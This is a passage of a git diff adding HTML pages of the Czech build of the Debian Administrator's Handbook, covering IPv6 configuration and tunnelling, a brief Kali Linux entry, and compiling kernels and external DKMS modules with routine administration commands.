+        title="10.6. Domain Name Servers (DNS)" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.ipv6.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.dynamic-routing.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.domain-name-servers.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.ipv6"></a>10.5. IPv6</h2></div></div></div><div
+          class="para">
+			IPv6, successor to IPv4, is a new version of the IP protocol designed to fix its flaws, most notably the scarcity of available IP addresses. This protocol handles the network layer; its purpose is to provide a way to address machines, to convey data to their intended destination, and to handle data fragmentation if needed (in other words, to split packets into chunks with a size that depends on the network links to be used on the path and to reassemble the chunks in their proper order on arrival).
+		</div><div
+          class="para">
+			Debian kernels include IPv6 handling in the core kernel (with the exception of some architectures that have it compiled as a module named <code
+            class="literal">ipv6</code>). Basic tools such as <code
+            class="command">ping</code> and <code
+            class="command">traceroute</code> have their IPv6 equivalents in <code
+            class="command">ping6</code> and <code
+            class="command">traceroute6</code>, available respectively in the <span
+            class="pkg pkg">iputils-ping</span> and <span
+            class="pkg pkg">iputils-tracepath</span> packages.
+		</div><a
+          id="id-1.13.8.4"
+          class="indexterm"></a><a
+          id="id-1.13.8.5"
+          class="indexterm"></a><a
+          id="id-1.13.8.6"
+          class="indexterm"></a><div
+          class="para">
+			The IPv6 network is configured similarly to IPv4, in <code
+            class="filename">/etc/network/interfaces</code>. But if you want that network to be globally available, you must ensure that you have an IPv6-capable router relaying traffic to the global IPv6 network.
+		</div><div
+          class="example"><a
+            xmlns=""
+            id="example.network-interfaces-ipv6"></a><p
+            class="title"><strong>Příklad 10.10. Example of IPv6 configuration</strong></p><div
+            class="example-contents"><pre
+              class="programlisting">
+iface eth0 inet6 static
+    address 2001:db8:1234:5::1:1
+    netmask 64
+    # Disabling auto-configuration
+    # autoconf 0
+    # The router is auto-configured and has no fixed address
+    # (accept_ra 1). If it had:
+    # gateway 2001:db8:1234:5::1
+</pre></div></div><div
+          class="para">
+			IPv6 subnets usually have a netmask of 64 bits. This means that 2<sup>64</sup> distinct addresses exist within the subnet. This allows Stateless Address Autoconfiguration (<acronym
+            class="acronym">SLAAC</acronym>) to pick an address based on the network interface's MAC address. By default, if <acronym
+            class="acronym">SLAAC</acronym> is activated in your network and IPv6 on your computer, the kernel will automatically find IPv6 routers and configure the network interfaces.
+		</div><div
+          class="para">
+			This behavior may have privacy implications. If you switch networks frequently, e.g. with a laptop, you might not want your <acronym
+            class="acronym">MAC</acronym> address being a part of your public IPv6 address. This makes it easy to identify the same device across networks. A solution to this are IPv6 privacy extensions (which Debian enables by default if IPv6 connectivity is detected during initial installation), which will assign an additional randomly generated address to the interface, periodically change them and prefer them for outgoing connections. Incoming connections can still use the address generated by SLAAC. The following example, for use in <code
+            class="filename">/etc/network/interfaces</code>, activates these privacy extensions.
+		</div><div
+          class="example"><a
+            xmlns=""
+            id="example.network-interface-ipv6-privext"></a><p
+            class="title"><strong>Příklad 10.11. IPv6 privacy extensions</strong></p><div
+            class="example-contents"><pre
+              class="programlisting">
+iface eth0 inet6 auto
+    # Prefer the randomly assigned addresses for outgoing connections.
+    privext 2
+</pre></div></div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>TIP</em></span> Programs built with IPv6</strong></p></div></div></div><div
+            class="para">
+			Many pieces of software need to be adapted to handle IPv6. Most of the packages in Debian have been adapted already, but not all. If your favorite package does not work with IPv6 yet, you can ask for help on the <span
+              class="emphasis"><em>debian-ipv6</em></span> mailing-list. They might know about an IPv6-aware replacement and could file a bug to get the issue properly tracked. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="http://lists.debian.org/debian-ipv6/">http://lists.debian.org/debian-ipv6/</a></div>
+		</div></div><a
+          id="id-1.13.8.13"
+          class="indexterm"></a><a
+          id="id-1.13.8.14"
+          class="indexterm"></a><a
+          id="id-1.13.8.15"
+          class="indexterm"></a><div
+          class="para">
+			IPv6 connections can be restricted, in the same fashion as for IPv4: the standard Debian kernels include an adaptation of <span
+            class="emphasis"><em>netfilter</em></span> for IPv6. This IPv6-enabled <span
+            class="emphasis"><em>netfilter</em></span> is configured in a similar fashion to its IPv4 counterpart, except the program to use is <code
+            class="command">ip6tables</code> instead of <code
+            class="command">iptables</code>.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.ipv6-tunneling"></a>10.5.1. Tunneling</h3></div></div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CAUTION</em></span> IPv6 tunneling and firewalls</strong></p></div></div></div><div
+              class="para">
+				IPv6 tunneling over IPv4 (as opposed to native IPv6) requires the firewall to accept the traffic, which uses IPv4 protocol number 41.
+			</div></div><div
+            class="para">
+				If a native IPv6 connection is not available, the fallback method is to use a tunnel over IPv4. Gogo6 is one (free) provider of such tunnels: <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="http://www.gogo6.com/freenet6/tunnelbroker">http://www.gogo6.com/freenet6/tunnelbroker</a></div>
+			</div><a
+            id="id-1.13.8.17.4"
+            class="indexterm"></a><a
+            id="id-1.13.8.17.5"
+            class="indexterm"></a><div
+            class="para">
+				To use a Freenet6 tunnel, you need to register for a Freenet6 Pro account on the website, then install the <span
+              class="pkg pkg">gogoc</span> package and configure the tunnel. This requires editing the <code
+              class="filename">/etc/gogoc/gogoc.conf</code> file: <code
+              class="literal">userid</code> and <code
+              class="literal">password</code> lines received by e-mail should be added, and <code
+              class="literal">server</code> should be replaced with <code
+              class="literal">authenticated.freenet6.net</code>.
+			</div><div
+            class="para">
+				IPv6 connectivity is proposed to all machines on a local network by adding the three following directives to the <code
+              class="filename">/etc/gogoc/gogoc.conf</code> file (assuming the local network is connected to the eth0 interface):
+			</div><pre
+            class="programlisting">
+host_type=router
+prefixlen=56
+if_prefix=eth0
+</pre><div
+            class="para">
+				The machine then becomes the access router for a subnet with a 56-bit prefix. Once the tunnel is aware of this change, the local network must be told about it; this implies installing the <code
+              class="command">radvd</code> daemon (from the similarly-named package). This IPv6 configuration daemon has a role similar to <code
+              class="command">dhcpd</code> in the IPv4 world.
+			</div><div
+            class="para">
+				The <code
+              class="filename">/etc/radvd.conf</code> configuration file must then be created (see <code
+              class="filename">/usr/share/doc/radvd/examples/simple-radvd.conf</code> as a starting point). In our case, the only required change is the prefix, which needs to be replaced with the one provided by Freenet6; it can be found in the output of the <code
+              class="command">ifconfig</code> command, in the block concerning the <code
+              class="literal">tun</code> interface.
+			</div><a
+            id="id-1.13.8.17.11"
+            class="indexterm"></a><div
+            class="para">
+				Then run <code
+              class="command">service gogoc restart</code> and <code
+              class="command">service radvd start</code>, and the IPv6 network should work.
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.dynamic-routing.html"><strong>Předcházející</strong>10.4. Dynamic Routing</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.domain-name-servers.html"><strong>Další</strong>10.6. Domain Name Servers (DNS)</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.kali.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.kali.html
new file mode 100644
index 000000000..b09a802cb
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.kali.html
@@ -0,0 +1,91 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">A.8. Kali Linux</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Live CD, Specificities, Particular Choices" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="derivative-distributions.html"
+        title="Příloha A. Derivative Distributions" /><link
+        rel="prev"
+        href="sect.tails.html"
+        title="A.7. Tails" /><link
+        rel="next"
+        href="sect.devuan.html"
+        title="A.9. Devuan" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.kali.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.tails.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.devuan.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.kali"></a>A.8. Kali Linux</h2></div></div></div><a
+          id="id-1.20.11.2"
+          class="indexterm"></a><a
+          id="id-1.20.11.3"
+          class="indexterm"></a><a
+          id="id-1.20.11.4"
+          class="indexterm"></a><div
+          class="para">
+			Kali Linux is a Debian-based distribution specialising in penetration testing (“pentesting” for short). It provides software that helps auditing the security of an existing network or computer while it is live, and analyze it after an attack (which is known as “computer forensics”). <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="https://kali.org">https://kali.org</a></div>
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.tails.html"><strong>Předcházející</strong>A.7. Tails</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.devuan.html"><strong>Další</strong>A.9. Devuan</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.kernel-compilation.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.kernel-compilation.html
new file mode 100644
index 000000000..0267e8a2c
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.kernel-compilation.html
@@ -0,0 +1,425 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">8.10. Compiling a Kernel</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Configuration, Localization, Locales, Network, Name resolution, Users, Groups, Accounts, Command-line interpreter, Shell, Printing, Bootloader, Kernel compiling" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="basic-configuration.html"
+        title="Kapitola 8. Basic Configuration: Network, Accounts, Printing..." /><link
+        rel="prev"
+        href="sect.config-misc.html"
+        title="8.9. Other Configurations: Time Synchronization, Logs, Sharing Access…" /><link
+        rel="next"
+        href="sect.kernel-installation.html"
+        title="8.11. Installing a Kernel" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.kernel-compilation.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.config-misc.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.kernel-installation.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.kernel-compilation"></a>8.10. Compiling a Kernel</h2></div></div></div><a
+          id="id-1.11.14.2"
+          class="indexterm"></a><a
+          id="id-1.11.14.3"
+          class="indexterm"></a><div
+          class="para">
+			The kernels provided by Debian include the largest possible number of features, as well as the maximum of drivers, in order to cover the broadest spectrum of existing hardware configurations. This is why some users prefer to recompile the kernel in order to only include what they specifically need. There are two reasons for this choice. First, it may be to optimize memory consumption, since the kernel code, even if it is never used, occupies memory for nothing (and never “goes down” on the swap space, since it is actual RAM that it uses), which can decrease overall system performance. A locally compiled kernel can also limit the risk of security problems since only a fraction of the kernel code is compiled and run.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>NOTE</em></span> Security updates</strong></p></div></div></div><div
+            class="para">
+			If you choose to compile your own kernel, you must accept the consequences: Debian cannot ensure security updates for your custom kernel. By keeping the kernel provided by Debian, you benefit from updates prepared by the Debian Project's security team.
+		</div></div><div
+          class="para">
+			Recompilation of the kernel is also necessary if you want to use certain features that are only available as patches (and not included in the standard kernel version).
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>GOING FURTHER</em></span> The Debian Kernel Handbook</strong></p></div></div></div><a
+            id="id-1.11.14.7.2"
+            class="indexterm"></a><div
+            class="para">
+			The Debian kernel teams maintains the “Debian Kernel Handbook” (also available in the <span
+              class="pkg pkg">debian-kernel-handbook</span> package) with comprehensive documentation about most kernel related tasks and about how official Debian kernel packages are handled. This is the first place you should look into if you need more information than what is provided in this section. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://kernel-team.pages.debian.net/kernel-handbook/">https://kernel-team.pages.debian.net/kernel-handbook/</a></div>
+		</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.kernel-compilation-prerequisites"></a>8.10.1. Introduction and Prerequisites</h3></div></div></div><div
+            class="para">
+				Unsurprisingly Debian manages the kernel in the form of a package, which is not how kernels have traditionally been compiled and installed. Since the kernel remains under the control of the packaging system, it can then be removed cleanly, or deployed on several machines. Furthermore, the scripts associated with these packages automate the interaction with the bootloader and the initrd generator.
+			</div><div
+            class="para">
+				The upstream Linux sources contain everything needed to build a Debian package of the kernel. But you still need to install <span
+              class="pkg pkg">build-essential</span> to ensure that you have the tools required to build a Debian package. Furthermore, the configuration step for the kernel requires the <span
+              class="pkg pkg">libncurses5-dev</span> package. Finally, the <span
+              class="pkg pkg">fakeroot</span> package will enable creation of the Debian package without using administrator's rights.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CULTURE</em></span> The good old days of <span
+                        class="pkg pkg">kernel-package</span></strong></p></div></div></div><a
+              id="id-1.11.14.8.4.2"
+              class="indexterm"></a><div
+              class="para">
+				Before the Linux build system gained the ability to build proper Debian packages, the recommended way to build such packages was to use <code
+                class="command">make-kpkg</code> from the <span
+                class="pkg pkg">kernel-package</span> package.
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.kernel-sources"></a>8.10.2. Getting the Sources</h3></div></div></div><a
+            id="id-1.11.14.9.2"
+            class="indexterm"></a><a
+            id="id-1.11.14.9.3"
+            class="indexterm"></a><a
+            id="id-1.11.14.9.4"
+            class="indexterm"></a><div
+            class="para">
+				Like anything that can be useful on a Debian system, the Linux kernel sources are available in a package. To retrieve them, just install the <span
+              class="pkg pkg">linux-source-<em
+                class="replaceable">version</em></span> package. The <code
+              class="command">apt search ^linux-source</code> command lists the various kernel versions packaged by Debian. The latest version is available in the <span
+              class="distribution distribution">Unstable</span> distribution: you can retrieve them without much risk (especially if your APT is configured according to the instructions of <a
+              class="xref"
+              href="sect.apt-get.html#sect.apt-mix-distros">6.2.6 – „Working with Several Distributions“</a>). Note that the source code contained in these packages does not correspond precisely with that published by Linus Torvalds and the kernel developers; like all distributions, Debian applies a number of patches, which might (or might not) find their way into the upstream version of Linux. These modifications include backports of fixes/features/drivers from newer kernel versions, new features not yet (entirely) merged in the upstream Linux tree, and sometimes even Debian specific changes.
+			</div><div
+            class="para">
+				The remainder of this section focuses on the 4.9 version of the Linux kernel, but the examples can, of course, be adapted to the particular version of the kernel that you want.
+			</div><div
+            class="para">
+				We assume the <span
+              class="pkg pkg">linux-source-4.9</span> package has been installed. It contains <code
+              class="filename">/usr/src/linux-source-4.9.tar.xz</code>, a compressed archive of the kernel sources. You must extract these files in a new directory (not directly under <code
+              class="filename">/usr/src/</code>, since there is no need for special permissions to compile a Linux kernel): <code
+              class="filename">~/kernel/</code> is appropriate.
+			</div><pre
+            class="screen">
+<code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>mkdir ~/kernel; cd ~/kernel</code></strong>
+<code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>tar -xaf /usr/src/linux-source-4.9.tar.xz</code></strong></pre><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CULTURE</em></span> Location of kernel sources</strong></p></div></div></div><div
+              class="para">
+				Traditionally, Linux kernel sources would be placed in <code
+                class="filename">/usr/src/linux/</code> thus requiring root permissions for compilation. However, working with administrator rights should be avoided when not needed. There is a <code
+                class="literal">src</code> group that allows members to work in this directory, but working in <code
+                class="filename">/usr/src/</code> should be avoided nevertheless. By keeping the kernel sources in a personal directory, you get security on all counts: no files in <code
+                class="filename">/usr/</code> unknown to the packaging system, and no risk of misleading programs that read <code
+                class="filename">/usr/src/linux</code> when trying to gather information on the used kernel.
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.config-kernel"></a>8.10.3. Configuring the Kernel</h3></div></div></div><a
+            id="id-1.11.14.10.2"
+            class="indexterm"></a><a
+            id="id-1.11.14.10.3"
+            class="indexterm"></a><a
+            id="id-1.11.14.10.4"
+            class="indexterm"></a><div
+            class="para">
+				The next step consists of configuring the kernel according to your needs. The exact procedure depends on the goals.
+			</div><div
+            class="para">
+				When recompiling a more recent version of the kernel (possibly with an additional patch), the configuration will most likely be kept as close as possible to that proposed by Debian. In this case, and rather than reconfiguring everything from scratch, it is sufficient to copy the <code
+              class="filename">/boot/config-<em
+                class="replaceable">version</em></code> file (the version is that of the kernel currently used, which can be found with the <code
+              class="command">uname -r</code> command) into a <code
+              class="filename">.config</code> file in the directory containing the kernel sources.
+			</div><pre
+            class="screen">
+<code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>cp /boot/config-4.9.0-3-amd64 ~/kernel/linux-source-4.9/.config</code></strong></pre><div
+            class="para">
+				Unless you need to change the configuration, you can stop here and skip to <a
+              class="xref"
+              href="sect.kernel-compilation.html#sect.kernel-build">8.10.4 – „Compiling and Building the Package“</a>. If you need to change it, on the other hand, or if you decide to reconfigure everything from scratch, you must take the time to configure your kernel. There are various dedicated interfaces in the kernel source directory that can be used by calling the <code
+              class="command">make <em
+                class="replaceable">target</em></code> command, where <em
+              class="replaceable">target</em> is one of the values described below.
+			</div><div
+            class="para">
+				<code
+              class="command">make menuconfig</code> compiles and executes a text-mode interface (this is where the <span
+              class="pkg pkg">libncurses5-dev</span> package is required) which allows navigating the options available in a hierarchical structure. Pressing the <span
+              class="keycap"><strong>Space</strong></span> key changes the value of the selected option, and <span
+              class="keycap"><strong>Enter</strong></span> validates the button selected at the bottom of the screen; <span
+              class="guibutton"><strong>Select</strong></span> returns to the selected sub-menu; <span
+              class="guibutton"><strong>Exit</strong></span> closes the current screen and moves back up in the hierarchy; <span
+              class="guibutton"><strong>Help</strong></span> will display more detailed information on the role of the selected option. The arrow keys allow moving within the list of options and buttons. To exit the configuration program, choose <span
+              class="guibutton"><strong>Exit</strong></span> from the main menu. The program then offers to save the changes you've made; accept if you are satisfied with your choices.
+			</div><div
+            class="para">
+				Other interfaces have similar features, but they work within more modern graphical interfaces; such as <code
+              class="command">make xconfig</code> which uses a Qt graphical interface, and <code
+              class="command">make gconfig</code> which uses GTK+. The former requires <span
+              class="pkg pkg">libqt4-dev</span>, while the latter depends on <span
+              class="pkg pkg">libglade2-dev</span> and <span
+              class="pkg pkg">libgtk2.0-dev</span>.
+			</div><div
+            class="para">
+				When using one of those configuration interfaces, it is always a good idea to start from a reasonable default configuration. The kernel provides such configurations in <code
+              class="filename">arch/<em
+                class="replaceable">arch</em>/configs/*_defconfig</code> and you can put your selected configuration in place with a command like <code
+              class="command">make x86_64_defconfig</code> (in the case of a 64-bit PC) or <code
+              class="command">make i386_defconfig</code> (in the case of a 32-bit PC).
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TIP</em></span> Dealing with outdated <code
+                        class="filename">.config</code> files</strong></p></div></div></div><div
+              class="para">
+				When you provide a <code
+                class="filename">.config</code> file that has been generated with another (usually older) kernel version, you will have to update it. You can do so with <code
+                class="command">make oldconfig</code>, it will interactively ask you the questions corresponding to the new configuration options. If you want to use the default answer to all those questions you can use <code
+                class="command">make olddefconfig</code>. With <code
+                class="command">make oldnoconfig</code>, it will assume a negative answer to all questions.
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.kernel-build"></a>8.10.4. Compiling and Building the Package</h3></div></div></div><a
+            id="id-1.11.14.11.2"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>NOTE</em></span> Clean up before rebuilding</strong></p></div></div></div><div
+              class="para">
+				If you have already compiled once in the directory and wish to rebuild everything from scratch (for example because you substantially changed the kernel configuration), you will have to run <code
+                class="command">make clean</code> to remove the compiled files. <code
+                class="command">make distclean</code> removes even more generated files, including your <code
+                class="filename">.config</code> file too, so make sure to backup it first.
+			</div></div><div
+            class="para">
+				Once the kernel configuration is ready, a simple <code
+              class="command">make deb-pkg</code> will generate up to 5 Debian packages: <span
+              class="pkg pkg">linux-image-<em
+                class="replaceable">version</em></span> that contains the kernel image and the associated modules, <span
+              class="pkg pkg">linux-headers-<em
+                class="replaceable">version</em></span> which contains the header files required to build external modules, <span
+              class="pkg pkg">linux-firmware-image-<em
+                class="replaceable">version</em></span> which contains the firmware files needed by some drivers (this package might be missing when you build from the kernel sources provided by Debian), <span
+              class="pkg pkg">linux-image-<em
+                class="replaceable">version</em>-dbg</span> which contains the debugging symbols for the kernel image and its modules, and <span
+              class="pkg pkg">linux-libc-dev</span> which contains headers relevant to some user-space libraries like GNU glibc.
+			</div><div
+            class="para">
+				The <em
+              class="replaceable">version</em> is defined by the concatenation of the upstream version (as defined by the variables <code
+              class="literal">VERSION</code>, <code
+              class="literal">PATCHLEVEL</code>, <code
+              class="literal">SUBLEVEL</code> and <code
+              class="literal">EXTRAVERSION</code> in the <code
+              class="filename">Makefile</code>), of the <code
+              class="literal">LOCALVERSION</code> configuration parameter, and of the <code
+              class="literal">LOCALVERSION</code> environment variable. The package version reuses the same version string with an appended revision that is regularly incremented (and stored in <code
+              class="filename">.version</code>), except if you override it with the <code
+              class="literal">KDEB_PKGVERSION</code> environment variable.
+			</div><pre
+            class="screen"><code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>make deb-pkg LOCALVERSION=-falcot KDEB_PKGVERSION=$(make kernelversion)-1
+</code></strong><code
+              class="computeroutput">[...]
+$ </code><strong
+              class="userinput"><code>ls ../*.deb
+</code></strong><code
+              class="computeroutput">../linux-headers-4.9.30-ckt4-falcot_4.9.30-1_amd64.deb
+../linux-image-4.9.30-ckt4-falcot_4.9.30-1_amd64.deb
+../linux-image-4.9.30-ckt4-falcot-dbg_4.9.30-1_amd64.deb
+../linux-libc-dev_4.9.30-1_amd64.deb
+</code></pre></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.modules-build"></a>8.10.5. Compiling External Modules</h3></div></div></div><a
+            id="id-1.11.14.12.2"
+            class="indexterm"></a><a
+            id="id-1.11.14.12.3"
+            class="indexterm"></a><a
+            id="id-1.11.14.12.4"
+            class="indexterm"></a><div
+            class="para">
+				Some modules are maintained outside of the official Linux kernel. To use them, they must be compiled alongside the matching kernel. A number of common third party modules are provided by Debian in dedicated packages, such as <span
+              class="pkg pkg">xtables-addons-source</span> (extra modules for iptables) or <span
+              class="pkg pkg">oss4-source</span> (Open Sound System, some alternative audio drivers).
+			</div><div
+            class="para">
+				These external packages are many and varied and we won't list them all here; the <code
+              class="command">apt-cache search source$</code> command can narrow down the search field. However, a complete list isn't particularly useful since there is no particular reason for compiling external modules except when you know you need it. In such cases, the device's documentation will typically detail the specific module(s) it needs to function under Linux.
+			</div><div
+            class="para">
+				For example, let's look at the <span
+              class="pkg pkg">xtables-addons-source</span> package: after installation, a <code
+              class="filename">.tar.bz2</code> of the module's sources is stored in <code
+              class="filename">/usr/src/</code>. While we could manually extract the tarball and build the module, in practice we prefer to automate all this using DKMS. Most modules offer the required DKMS integration in a package ending with a <code
+              class="literal">-dkms</code> suffix. In our case, installing <span
+              class="pkg pkg">xtables-addons-dkms</span> is all that is needed to compile the kernel module for the current kernel provided that we have the <span
+              class="pkg pkg">linux-headers-*</span> package matching the installed kernel. For instance, if you use <span
+              class="pkg pkg">linux-image-amd64</span>, you would also install <span
+              class="pkg pkg">linux-headers-amd64</span>.
+			</div><pre
+            class="screen">
+<code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>sudo apt install xtables-addons-dkms</code></strong>
+<code
+              class="computeroutput">
+[...]
+Setting up xtables-addons-dkms (2.12-0.1) ...
+Loading new xtables-addons-2.12 DKMS files...
+Building for 4.9.0-3-amd64
+Building initial module for 4.9.0-3-amd64
+Done.
+
+xt_ACCOUNT:
+Running module version sanity check.
+ - Original module
+   - No original module exists within this kernel
+ - Installation
+   - Installing to /lib/modules/4.9.0-3-amd64/updates/dkms/
+[...]
+DKMS: install completed.
+$ </code><strong
+              class="userinput"><code>sudo dkms status</code></strong>
+<code
+              class="computeroutput">xtables-addons, 2.12, 4.9.0-3-amd64, x86_64: installed
+$ </code><strong
+              class="userinput"><code>sudo modinfo xt_ACCOUNT</code></strong>
+<code
+              class="computeroutput">filename:       /lib/modules/4.9.0-3-amd64/updates/dkms/xt_ACCOUNT.ko
+license:        GPL
+alias:          ipt_ACCOUNT
+author:         Intra2net AG &lt;opensource@intra2net.com&gt;
+description:    Xtables: per-IP accounting for large prefixes
+[...]
+</code></pre><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>ALTERNATIVE</em></span> module-assistant</strong></p></div></div></div><a
+              id="id-1.11.14.12.9.2"
+              class="indexterm"></a><div
+              class="para">
+				Before DKMS, <span
+                class="pkg pkg">module-assistant</span> was the simplest solution to build and deploy kernel modules. It can still be used, in particular for packages lacking DKMS integration: with a simple command like <code
+                class="command">module-assistant auto-install xtables-addons</code> (or <code
+                class="command">m-a a-i xtables-addons</code> for short), the modules are compiled for the current kernel, put in a new Debian package, and that package gets installed on the fly.
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
